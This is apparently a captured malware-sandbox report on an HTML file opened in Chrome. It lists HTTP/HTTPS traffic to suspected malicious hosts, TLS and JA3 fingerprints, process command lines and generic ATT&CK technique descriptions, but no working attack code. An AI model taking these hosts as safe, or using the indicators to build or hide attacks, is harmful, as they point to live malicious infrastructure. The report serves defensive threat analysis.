May 12, 2021 21:52:08.679579020 CEST	2240	IN	HTTP/1.1 200 OK Date: Wed, 12 May 2021 19:52:08 GMT Server: Apache Content-Encoding: gzip Vary: Accept-Encoding Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cb 28 29 29 28 b6 d2 d7 2f 2f ca 2c 49 2d ca a9 d4 4b 4e d4 57 2e c8 48 4d cd 4e 75 48 2d 4e d1 2b 4f d4 4b cf 2f 03 00 e5 96 09 bf 26 00 00 00 0d 0a Data Ascii: 3a())(//,I-KNW.HMNuH-N+OK/&

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49718	103.120.64.61	80	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 21:52:08.382438898 CEST	2238	OUT	GET /favicon.ico HTTP/1.1 Host: esd.rwbdg.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8 Referer: http://esd.rwbdg.com/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
May 12, 2021 21:52:08.694844007 CEST	2240	IN	HTTP/1.1 200 OK Date: Wed, 12 May 2021 19:52:08 GMT Server: Apache Content-Encoding: gzip Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 12, 2021 21:52:23.096194983 CEST	5.144.130.32	443	192.168.2.3	49774	CN=eaqarat-iran.ir	CN=R3, O=Let's Encrypt, C=US	Sun Apr 18 23:00:56 CEST 2021	Sat Jul 17 23:00:56 CEST 2021	771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,0-23-65281-10-11-35-16-5-13-18-51-45-43-27-21,29-23-24,0	b32309a26951912be7dba376398abc3b
May 12, 2021 21:52:23.100733042 CEST	5.144.130.32	443	192.168.2.3	49775	CN=eaqarat-iran.ir CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sun Apr 18 23:00:56 CEST 2021 Wed Oct 07 21:21:40 CEST 2020	Sat Jul 17 23:00:56 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,0-23-65281-10-11-35-16-5-13-18-51-45-43-27-21,29-23-24,0	b32309a26951912be7dba376398abc3b
May 12, 2021 21:52:23.100733042 CEST	5.144.130.32	443	192.168.2.3	49775	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		b32309a26951912be7dba376398abc3b
May 12, 2021 21:52:27.802820921 CEST	5.144.130.32	443	192.168.2.3	49786	CN=eaqarat-iran.ir	CN=R3, O=Let's Encrypt, C=US	Sun Apr 18 23:00:56 CEST 2021	Sat Jul 17 23:00:56 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exe PID: 5388 Parent PID: 2592

General

Start time:	21:52:01
Start date:	12/05/2021
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'C:\Users\user\Desktop\5781525.html'
Imagebase:	0x7ff77b960000
File size:	2150896 bytes
MD5 hash:	C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: chrome.exe PID: 6276 Parent PID: 5388

General

Start time:	21:52:02
Start date:	12/05/2021
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1492,177793998006335442,11202177534024855872,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1708 /prefetch:8
Imagebase:	0x7ff77b960000
File size:	2150896 bytes
MD5 hash:	C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Disassembly

Reset < >

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 5781525.html

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

Signature Overview

AV Detection:

Phishing:

Compliance:

Networking:

System Summary:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: chrome.exe PID: 5388 Parent PID: 2592

General

Analysis Process: chrome.exe PID: 6276 Parent PID: 5388

General

Disassembly